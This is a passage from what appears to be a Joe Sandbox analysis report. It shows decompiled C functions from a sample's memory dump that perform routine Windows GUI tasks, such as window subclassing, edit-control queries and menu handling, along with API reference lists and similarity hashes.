                                                                                                                                                                                                                                                                                          								if(_t43 == 0x82) {
                                                                                                                                                                                                                                                                                          									_a8 = GetWindowLongA( *_t74, 0xfffffffc);
                                                                                                                                                                                                                                                                                          									_a4 = CallWindowProcA(_t74[6],  *_t74, 0x82, _t71, _t54);
                                                                                                                                                                                                                                                                                          									__eflags = _t74[6] - __imp__DefWindowProcA; // 0x778fd1c0
                                                                                                                                                                                                                                                                                          									if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          										_t49 = GetWindowLongA( *_t74, 0xfffffffc);
                                                                                                                                                                                                                                                                                          										__eflags = _t49 - _a8;
                                                                                                                                                                                                                                                                                          										if(_t49 == _a8) {
                                                                                                                                                                                                                                                                                          											SetWindowLongA( *_t74, 0xfffffffc, _t74[6]);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *_t74 = 0;
                                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t52 = CallWindowProcA(_t74[6],  *_t74, _t43, _t71, _t54);
                                                                                                                                                                                                                                                                                          									_a4 = _t52;
                                                                                                                                                                                                                                                                                          									return _t52;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}























                                                                                                                                                                                                                                                                                          0x00101cc7
                                                                                                                                                                                                                                                                                          0x00101cce
                                                                                                                                                                                                                                                                                          0x00101dce
                                                                                                                                                                                                                                                                                          0x00101dce
                                                                                                                                                                                                                                                                                          0x00101dd4
                                                                                                                                                                                                                                                                                          0x00101cd4
                                                                                                                                                                                                                                                                                          0x00101cd4
                                                                                                                                                                                                                                                                                          0x00101cd8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101cde
                                                                                                                                                                                                                                                                                          0x00101cde
                                                                                                                                                                                                                                                                                          0x00101ce3
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101ce9
                                                                                                                                                                                                                                                                                          0x00101cea
                                                                                                                                                                                                                                                                                          0x00101cee
                                                                                                                                                                                                                                                                                          0x00101cf1
                                                                                                                                                                                                                                                                                          0x00101cf4
                                                                                                                                                                                                                                                                                          0x00101cf7
                                                                                                                                                                                                                                                                                          0x00101cfa
                                                                                                                                                                                                                                                                                          0x00101d01
                                                                                                                                                                                                                                                                                          0x00101d07
                                                                                                                                                                                                                                                                                          0x00101d15
                                                                                                                                                                                                                                                                                          0x00101d1c
                                                                                                                                                                                                                                                                                          0x00101d22
                                                                                                                                                                                                                                                                                          0x00101d29
                                                                                                                                                                                                                                                                                          0x00101d30
                                                                                                                                                                                                                                                                                          0x00101d33
                                                                                                                                                                                                                                                                                          0x00101d3b
                                                                                                                                                                                                                                                                                          0x00101d40
                                                                                                                                                                                                                                                                                          0x00101d45
                                                                                                                                                                                                                                                                                          0x00101dc2
                                                                                                                                                                                                                                                                                          0x00101dcb
                                                                                                                                                                                                                                                                                          0x00101d47
                                                                                                                                                                                                                                                                                          0x00101d47
                                                                                                                                                                                                                                                                                          0x00101d4f
                                                                                                                                                                                                                                                                                          0x00101d86
                                                                                                                                                                                                                                                                                          0x00101d8f
                                                                                                                                                                                                                                                                                          0x00101d95
                                                                                                                                                                                                                                                                                          0x00101d9b
                                                                                                                                                                                                                                                                                          0x00101da2
                                                                                                                                                                                                                                                                                          0x00101da8
                                                                                                                                                                                                                                                                                          0x00101dab
                                                                                                                                                                                                                                                                                          0x00101db6
                                                                                                                                                                                                                                                                                          0x00101db6
                                                                                                                                                                                                                                                                                          0x00101dab
                                                                                                                                                                                                                                                                                          0x00101dbc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00101d51
                                                                                                                                                                                                                                                                                          0x00101d5b
                                                                                                                                                                                                                                                                                          0x00101d63
                                                                                                                                                                                                                                                                                          0x00101d6a
                                                                                                                                                                                                                                                                                          0x00101d6a
                                                                                                                                                                                                                                                                                          0x00101d4f
                                                                                                                                                                                                                                                                                          0x00101d45
                                                                                                                                                                                                                                                                                          0x00101ce3
                                                                                                                                                                                                                                                                                          0x00101cd8

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                                          • API String ID: 513923721-3993045852
                                                                                                                                                                                                                                                                                          • Opcode ID: 30c795b8b24dc61bc7dab495b6971dd5598cd8bd0c40cb0ac22a44a8a7a3254c
                                                                                                                                                                                                                                                                                          • Instruction ID: c97fccaf5d0266b297e9ff412ce0a215fc905ba1e349353ca78f75f6939a35d4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c795b8b24dc61bc7dab495b6971dd5598cd8bd0c40cb0ac22a44a8a7a3254c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C641D3B5A00209AFDB14DF59D88499BB7F9FF4C310B208A1AF895D7650D774E980CFA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000F8AB0(void* __ebx) {
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				long _t27;
                                                                                                                                                                                                                                                                                          				void* _t64;
                                                                                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t64 = __ebx;
                                                                                                                                                                                                                                                                                          				_t27 = SendMessageA( *(__ebx + 0x254), 0xb8, 0, 0);
                                                                                                                                                                                                                                                                                          				if(_t27 !=  *(__ebx + 0x4b4)) {
                                                                                                                                                                                                                                                                                          					 *(__ebx + 0x4b4) = _t27;
                                                                                                                                                                                                                                                                                          					E000F8160(__ebx);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t83 = _t64 + 0x3c;
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe12b, _t83, SendMessageA( *(_t64 + 0x254), 0xc6, 0, 0));
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe125, _t83, SendMessageA( *(_t64 + 0x254), 0x432, 1, 0));
                                                                                                                                                                                                                                                                                          				_t79 = 0 | SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0x00000000;
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe123, _t83, SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0);
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe122, _t83, SendMessageA( *(_t64 + 0x254), 0x442, 0, 0) != 0);
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe120, _t83, _t79);
                                                                                                                                                                                                                                                                                          				_t80 = 0 | GetWindowTextLengthA( *(_t64 + 0x254)) > 0x00000000;
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe12a, _t83, GetWindowTextLengthA( *(_t64 + 0x254)) > 0);
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe124, _t83, GetWindowTextLengthA( *(_t64 + 0x254)) > 0);
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe128, _t83, _t80);
                                                                                                                                                                                                                                                                                          				E000F53A0(0xe129, _t83, _t80);
                                                                                                                                                                                                                                                                                          				_t81 = _t83;
                                                                                                                                                                                                                                                                                          				E000F5440(0x9c43, _t83,  *((intOrPtr*)(_t64 + 0x4b0)));
                                                                                                                                                                                                                                                                                          				if(IsWindow( *(_t64 + 0x4c8)) != 0 && (GetWindowLongA( *(_t64 + 0x4c8), 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                                                                                                                                                                                          					E000F53A0(0x9c46, _t83, 0 |  *((intOrPtr*)(_t64 + 0x504)) -  *((intOrPtr*)(_t64 + 0x508)) > 0x00000000);
                                                                                                                                                                                                                                                                                          					E000F53A0(0x9c4b, _t83, 0 |  *((intOrPtr*)(_t64 + 0x504)) -  *((intOrPtr*)(_t64 + 0x50c)) < 0x00000000);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_push(_t83);
                                                                                                                                                                                                                                                                                          				return E000F5580(_t81);
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000f8ab0
                                                                                                                                                                                                                                                                                          0x000f8ac2
                                                                                                                                                                                                                                                                                          0x000f8ace
                                                                                                                                                                                                                                                                                          0x000f8ad2
                                                                                                                                                                                                                                                                                          0x000f8ad8
                                                                                                                                                                                                                                                                                          0x000f8ad8
                                                                                                                                                                                                                                                                                          0x000f8af3
                                                                                                                                                                                                                                                                                          0x000f8afe
                                                                                                                                                                                                                                                                                          0x000f8b1b
                                                                                                                                                                                                                                                                                          0x000f8b3f
                                                                                                                                                                                                                                                                                          0x000f8b42
                                                                                                                                                                                                                                                                                          0x000f8b4d
                                                                                                                                                                                                                                                                                          0x000f8b58
                                                                                                                                                                                                                                                                                          0x000f8b76
                                                                                                                                                                                                                                                                                          0x000f8b79
                                                                                                                                                                                                                                                                                          0x000f8b84
                                                                                                                                                                                                                                                                                          0x000f8b8f
                                                                                                                                                                                                                                                                                          0x000f8b9a
                                                                                                                                                                                                                                                                                          0x000f8bab
                                                                                                                                                                                                                                                                                          0x000f8bad
                                                                                                                                                                                                                                                                                          0x000f8bc1
                                                                                                                                                                                                                                                                                          0x000f8bf0
                                                                                                                                                                                                                                                                                          0x000f8c0c
                                                                                                                                                                                                                                                                                          0x000f8c0c
                                                                                                                                                                                                                                                                                          0x000f8c11
                                                                                                                                                                                                                                                                                          0x000f8c19

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B8,00000000,00000000), ref: 000F8AC2
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000C6,00000000,00000000), ref: 000F8AF6
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000432,00000001,00000000), ref: 000F8B13
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000442,00000000,00000000), ref: 000F8B30
                                                                                                                                                                                                                                                                                          • GetWindowTextLengthA.USER32(?), ref: 000F8B64
                                                                                                                                                                                                                                                                                          • IsWindow.USER32(?), ref: 000F8BB9
                                                                                                                                                                                                                                                                                          • GetWindowLongA.USER32 ref: 000F8BCC
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F8182
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: LoadStringA.USER32 ref: 000F81A2
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrlenA.KERNEL32(?,?,?), ref: 000F81AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcpyA.KERNEL32(?,?,?,?), ref: 000F81C4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,00112A2C), ref: 000F81DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?, - ), ref: 000F81E7
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: lstrcatA.KERNEL32(?,?,?, - ), ref: 000F81F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F8160: SetWindowTextA.USER32(?), ref: 000F81F8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSendWindow$lstrcat$Textlstrlen$LengthLoadLongStringlstrcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2003012902-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a0c71c3dc196eac9e16852608f1e76493f5b8693d46ea2499feeefea358bc71d
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e8cb5755d2d3ca04800679eeea38f475debccd08e4c50caebabb349c58c9a7d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0c71c3dc196eac9e16852608f1e76493f5b8693d46ea2499feeefea358bc71d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D031A3757005052BE704AB69CC85FEB2668EFC4701F948438BB05EF6C7C9B8E9419774
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                          			E000F6F30(int __ecx, int __edx, void* __esi, long _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                                                                                          				long _t35;
                                                                                                                                                                                                                                                                                          				long _t39;
                                                                                                                                                                                                                                                                                          				long _t47;
                                                                                                                                                                                                                                                                                          				void* _t54;
                                                                                                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                                                                                                          				long _t66;
                                                                                                                                                                                                                                                                                          				long _t67;
                                                                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                                                                                                          				long _t70;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t68 = __esi;
                                                                                                                                                                                                                                                                                          				_t31 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t31 ^ _t69;
                                                                                                                                                                                                                                                                                          				_t35 = CallWindowProcA( *(__esi + 0x20),  *(__esi + 4), __edx, __ecx, _a4);
                                                                                                                                                                                                                                                                                          				_t54 = SendMessageA;
                                                                                                                                                                                                                                                                                          				_v20 = _t35;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                                          				SendMessageA( *(__esi + 4), 0x434, 0,  &_v16);
                                                                                                                                                                                                                                                                                          				_t66 = _v12;
                                                                                                                                                                                                                                                                                          				_t39 = SendMessageA( *(__esi + 4), 0x436, 0, _t66);
                                                                                                                                                                                                                                                                                          				_t65 =  *(__esi + 4);
                                                                                                                                                                                                                                                                                          				 *(__esi + 0x50) = _t39;
                                                                                                                                                                                                                                                                                          				 *(__esi + 0x54) = 0;
                                                                                                                                                                                                                                                                                          				_t67 = _t66 - SendMessageA( *(__esi + 4), 0xbb, 0xffffffff, 0);
                                                                                                                                                                                                                                                                                          				if(_t67 > 0) {
                                                                                                                                                                                                                                                                                          					_t45 = _t67 + 1;
                                                                                                                                                                                                                                                                                          					if(_t67 + 1 < 2) {
                                                                                                                                                                                                                                                                                          						_t45 = 2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E0010ACA0(_t45);
                                                                                                                                                                                                                                                                                          					_t47 = _t70;
                                                                                                                                                                                                                                                                                          					_v12 = _t47;
                                                                                                                                                                                                                                                                                          					 *_t47 = _t67;
                                                                                                                                                                                                                                                                                          					_t67 = SendMessageA( *(_t68 + 4), 0xc4,  *(_t68 + 0x50), _t47);
                                                                                                                                                                                                                                                                                          					_t62 = 0;
                                                                                                                                                                                                                                                                                          					if(_t67 > 0) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_t65 = _v12;
                                                                                                                                                                                                                                                                                          							if( *((char*)(_t62 + _t65)) != 9) {
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t68 + 0x54)) =  *((intOrPtr*)(_t68 + 0x54)) + 1;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								asm("cdq");
                                                                                                                                                                                                                                                                                          								 *((intOrPtr*)(_t68 + 0x54)) = 8 + ( *((intOrPtr*)(_t68 + 0x54)) + _t65 >> 3) * 8;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t62 = _t62 + 1;
                                                                                                                                                                                                                                                                                          						} while (_t62 < _t67);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				SendMessageA(GetParent( *(_t68 + 4)), 0x7e8, 0, 0);
                                                                                                                                                                                                                                                                                          				return E001059E6(_v20, _t54, _v8 ^ _t69, _t65, _t67, _t68);
                                                                                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                                                                                          0x000f6f30
                                                                                                                                                                                                                                                                                          0x000f6f36
                                                                                                                                                                                                                                                                                          0x000f6f3d
                                                                                                                                                                                                                                                                                          0x000f6f50
                                                                                                                                                                                                                                                                                          0x000f6f56
                                                                                                                                                                                                                                                                                          0x000f6f5c
                                                                                                                                                                                                                                                                                          0x000f6f66
                                                                                                                                                                                                                                                                                          0x000f6f69
                                                                                                                                                                                                                                                                                          0x000f6f75
                                                                                                                                                                                                                                                                                          0x000f6f77
                                                                                                                                                                                                                                                                                          0x000f6f86
                                                                                                                                                                                                                                                                                          0x000f6f88
                                                                                                                                                                                                                                                                                          0x000f6f95
                                                                                                                                                                                                                                                                                          0x000f6f98
                                                                                                                                                                                                                                                                                          0x000f6fa1
                                                                                                                                                                                                                                                                                          0x000f6fa5
                                                                                                                                                                                                                                                                                          0x000f6fa7
                                                                                                                                                                                                                                                                                          0x000f6fad
                                                                                                                                                                                                                                                                                          0x000f6faf
                                                                                                                                                                                                                                                                                          0x000f6faf
                                                                                                                                                                                                                                                                                          0x000f6fb4
                                                                                                                                                                                                                                                                                          0x000f6fbc
                                                                                                                                                                                                                                                                                          0x000f6fc0
                                                                                                                                                                                                                                                                                          0x000f6fc3
                                                                                                                                                                                                                                                                                          0x000f6fd1
                                                                                                                                                                                                                                                                                          0x000f6fd3
                                                                                                                                                                                                                                                                                          0x000f6fd7
                                                                                                                                                                                                                                                                                          0x000f6fe0
                                                                                                                                                                                                                                                                                          0x000f6fe0
                                                                                                                                                                                                                                                                                          0x000f6fe7
                                                                                                                                                                                                                                                                                          0x000f7001
                                                                                                                                                                                                                                                                                          0x000f6fe9
                                                                                                                                                                                                                                                                                          0x000f6fec
                                                                                                                                                                                                                                                                                          0x000f6ffc
                                                                                                                                                                                                                                                                                          0x000f6ffc
                                                                                                                                                                                                                                                                                          0x000f7004
                                                                                                                                                                                                                                                                                          0x000f7005
                                                                                                                                                                                                                                                                                          0x000f6fe0
                                                                                                                                                                                                                                                                                          0x000f6fd7
                                                                                                                                                                                                                                                                                          0x000f701d
                                                                                                                                                                                                                                                                                          0x000f7034

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CallWindowProcA.USER32 ref: 000F6F50
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000434,00000000,?), ref: 000F6F75
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000436,00000000,?), ref: 000F6F86
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 000F6F9F
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000C4,?), ref: 000F6FCF
                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 000F700D
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000007E8,00000000,00000000), ref: 000F701D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CallParentProcWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2381976986-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c4753e498027cef2aa06949a20c5bb49e8ea9f50a12dd9deef383a50626d3b6c
                                                                                                                                                                                                                                                                                          • Instruction ID: 3d73a2ca7a291d13c1b142498c6f1bd906d126d5681992380b749653b40bf8e4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4753e498027cef2aa06949a20c5bb49e8ea9f50a12dd9deef383a50626d3b6c
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F315AB1A00708ABD720CB68CD81F6BB7F9FF88710F108919E65AD7A80DB70E904CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E00100580(struct HMENU__** __ebx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v28;
                                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                                          				struct tagMSG _v60;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t32;
                                                                                                                                                                                                                                                                                          				struct HWND__** _t35;
                                                                                                                                                                                                                                                                                          				struct HMENU__** _t47;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t59;
                                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                                          				int _t62;
                                                                                                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t47 = __ebx;
                                                                                                                                                                                                                                                                                          				_t32 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v12 = _t32 ^ _t63;
                                                                                                                                                                                                                                                                                          				_t59 =  *__ebx;
                                                                                                                                                                                                                                                                                          				_v32 = _a4;
                                                                                                                                                                                                                                                                                          				if(__ebx[2] == 0) {
                                                                                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                                                                                          					if(_t59 != 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t59);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t35 = _t47[1];
                                                                                                                                                                                                                                                                                          					_v28.left = _t35[6];
                                                                                                                                                                                                                                                                                          					_v28.top = _t35[7];
                                                                                                                                                                                                                                                                                          					_v28.right = _t35[8];
                                                                                                                                                                                                                                                                                          					_v28.bottom = _t35[9];
                                                                                                                                                                                                                                                                                          					MapWindowPoints( *_t35, 0,  &_v28, 2);
                                                                                                                                                                                                                                                                                          					_t60 = PeekMessageA;
                                                                                                                                                                                                                                                                                          					_v60.message = 0;
                                                                                                                                                                                                                                                                                          					_v60.wParam = 0;
                                                                                                                                                                                                                                                                                          					_v60.lParam = 0;
                                                                                                                                                                                                                                                                                          					_v60.time = 0;
                                                                                                                                                                                                                                                                                          					_v60.pt.x = 0;
                                                                                                                                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                                                                                                                                          					_t58 =  &_v60;
                                                                                                                                                                                                                                                                                          					_v60.hwnd = 0;
                                                                                                                                                                                                                                                                                          					if(PeekMessageA( &_v60,  *(_v32 + 4), 0x201, 0x201, 0) != 0) {
                                                                                                                                                                                                                                                                                          						_push(_v36);
                                                                                                                                                                                                                                                                                          						_t58 =  &_v28;
                                                                                                                                                                                                                                                                                          						if(PtInRect( &_v28, _v60.pt) != 0) {
                                                                                                                                                                                                                                                                                          							_t58 =  &_v60;
                                                                                                                                                                                                                                                                                          							_t40 = PeekMessageA( &_v60,  *(_v32 + 4), 0x201, 0x201, 1);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(_t40, _t47, _v12 ^ _t63, _t58, _t59, _t60);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t62 = GetMenuItemCount(_t59) - 1;
                                                                                                                                                                                                                                                                                          				if(_t62 < 0) {
                                                                                                                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                                          					RemoveMenu(_t59, _t62, 0x400);
                                                                                                                                                                                                                                                                                          					_t62 = _t62 - 1;
                                                                                                                                                                                                                                                                                          				} while (_t62 >= 0);
                                                                                                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x00100580
                                                                                                                                                                                                                                                                                          0x00100586
                                                                                                                                                                                                                                                                                          0x0010058d
                                                                                                                                                                                                                                                                                          0x00100599
                                                                                                                                                                                                                                                                                          0x0010059b
                                                                                                                                                                                                                                                                                          0x0010059e
                                                                                                                                                                                                                                                                                          0x001005c0
                                                                                                                                                                                                                                                                                          0x001005c2
                                                                                                                                                                                                                                                                                          0x001005c5
                                                                                                                                                                                                                                                                                          0x001005c5
                                                                                                                                                                                                                                                                                          0x001005cb
                                                                                                                                                                                                                                                                                          0x001005d3
                                                                                                                                                                                                                                                                                          0x001005d9
                                                                                                                                                                                                                                                                                          0x001005df
                                                                                                                                                                                                                                                                                          0x001005ee
                                                                                                                                                                                                                                                                                          0x001005f1
                                                                                                                                                                                                                                                                                          0x001005f7
                                                                                                                                                                                                                                                                                          0x00100605
                                                                                                                                                                                                                                                                                          0x00100608
                                                                                                                                                                                                                                                                                          0x0010060b
                                                                                                                                                                                                                                                                                          0x0010060e
                                                                                                                                                                                                                                                                                          0x00100611
                                                                                                                                                                                                                                                                                          0x00100614
                                                                                                                                                                                                                                                                                          0x00100623
